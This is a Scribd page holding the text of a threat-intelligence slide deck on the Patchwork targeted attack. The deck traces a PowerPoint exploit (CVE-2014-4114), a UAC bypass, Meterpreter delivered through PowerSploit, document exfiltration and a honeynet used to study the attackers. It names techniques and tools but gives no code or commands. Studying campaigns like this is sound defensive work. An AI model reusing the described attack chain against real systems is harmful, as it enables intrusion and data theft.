Scribd Logo
Upload

Welcome to Scribd!

  • Case Study Patchwork PDF

    Uploaded by

    hasan al
    33 views14 pages
    This document summarizes a targeted attack called "Patchwork" that infected over 2,500 machines using a Powerpoint presentation exploit. It used various tools like AutoIT, PowerSploit, and Meterpreter to gain access and elevate privileges, then exfiltrated documents. A deception campaign was launched to study the attackers, who were discovered accessing shared drives and cloud systems. The attackers' techniques included credential theft, VPN access, and document exfiltration over multiple days and IP addresses.

    Original Description:

    Original Title

    Case-Study-Patchwork.pdf

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes a targeted attack called "Patchwork" that infected over 2,500 machines using a Powerpoint presentation exploit. It used various tools like AutoIT, PowerSploit, and Meterpreter to gain access and elevate privileges, then exfiltrated documents. A deception campaign was launched to study the attackers, who were discovered accessing shared drives and cloud systems. The attackers' techniques included credential theft, VPN access, and document exfiltration over multiple days and IP addresses.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    33 views14 pages

    Case Study Patchwork PDF

    Uploaded by

    hasan al
    This document summarizes a targeted attack called "Patchwork" that infected over 2,500 machines using a Powerpoint presentation exploit. It used various tools like AutoIT, PowerSploit, and Meterpreter to gain access and elevate privileges, then exfiltrated documents. A deception campaign was launched to study the attackers, who were discovered accessing shared drives and cloud systems. The attackers' techniques included credential theft, VPN access, and document exfiltration over multiple days and IP addresses.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 14

    Patchwork

    CASE STUDY, COURTESY OF GADI EVRON, CYMMETRIA


    Background

    • First observed December 2015


    • At least 2,500 machines
    infected
    • Targets: military and political
    personnel
    ― Especially working on issues
    related to S.E. Asia and the
    South China Sea
    • Attack vector: Powerpoint
    presentation
    • Exploit: Sandworm –CVE-2014-
    4114
    ― Only affects unpatched
    Microsoft Office Powerpoint
    2003 and 2007

    2
    First Stage Payload: Compiled Script

    • This script was written in AutoIT


    • Bypassed UAC using a method called UACME, which had been posted to a
    hacker forum:

    3
    Next Stages

    • Now having elevated privileges, it used PowerSploit to download and run


    Meterpreter
    ― Remote Access Trojan component of the MetaSploit penetration testing
    framework
    • Meterpreter was used to locate and exfiltrate documents in order for the
    attacker to gauge the value of the target
    ― If considered valuable, the attacker then delivered a second payload, also built
    from snippets of code taken from various online forums and other resources

    4
    Next Stages (cont)

    5
    Deception Campaign

    • Goal: discover as much as possible about the threat actor, especially tools,
    techniques and procedures
    ― Allowing subsequent detection elsewhere
    ― Prevent future attacks against Cymmetria’s customer
    • Honeynet environment
    ― Breadcrumbs: snippets of data which lead the attacker to a new machine:
     Credentials, browser cookies, network shares, VPN connections, etc.
    ― Decoys: full operating systems running in VM’s; represent high-value targets for
    the attacker
    • The lure: a fake profile for a person in whom the attacker was interested

    6
    The Deception Campaign

    7
    The Chain of Events

    1. The Powerpoint PPS was opened on a target laptop and dropped the initial
    payload components
    2. The Meterpreter reverse shell was pulled from the C2 server
    3. Files from the target laptop were exfiltrated to the C2 server along with
    some encrypted traffic
    4. The attacker decided to drop the second stage malware; this scanned the
    hard drive
    5. It copied itself as C:\Windows\SysWoW64\netvmon.exe and added this to
    the startup programs
    6. Three days later, alerts were received on the decoy running an SMB share
    7. The malware accessed the shared drive and scanned it for files
    8. Someone attempted to connect to a cloud decoy using RDP
    9. They failed to log in (could have done it using Mimikatz)
    10. The IP address suggests the same attacker

    8
    Honeynet Map

    9
    PPS Files on the C2 Server

    10
    Secondary Infection Stages

    11
    Attribution

    12
    Mapped to the Working Day
    DARKER GREY INDICATES MORE EDITS

    13
    Lessons

    • Reconnaisance: collection of identity information of military and political


    workers with specific interests
    • Weaponization: infected Powerpoint presentation
    ― Lots of military/government briefing packages are delivered by Powerpoint
    • Delivery: spear-phishing campaign, reusing documents exfiltrated previously
    • Exploit: A chain: Sandworm, privilege escalation, then Meterpreter pulled
    from C2
    • Action on objectives: exfiltration of documents
    Also: PATCH!
    • Exploit 2: 7zip.exe -> netvmon.exe
    • Installation: Added to startup programs
    • Action on objectives: exfiltration
    • C2: Various reused IP addresses
    • Full report available at https://cymmetria.com/research/patchwork-targeted-
    attack/

    14

    You might also like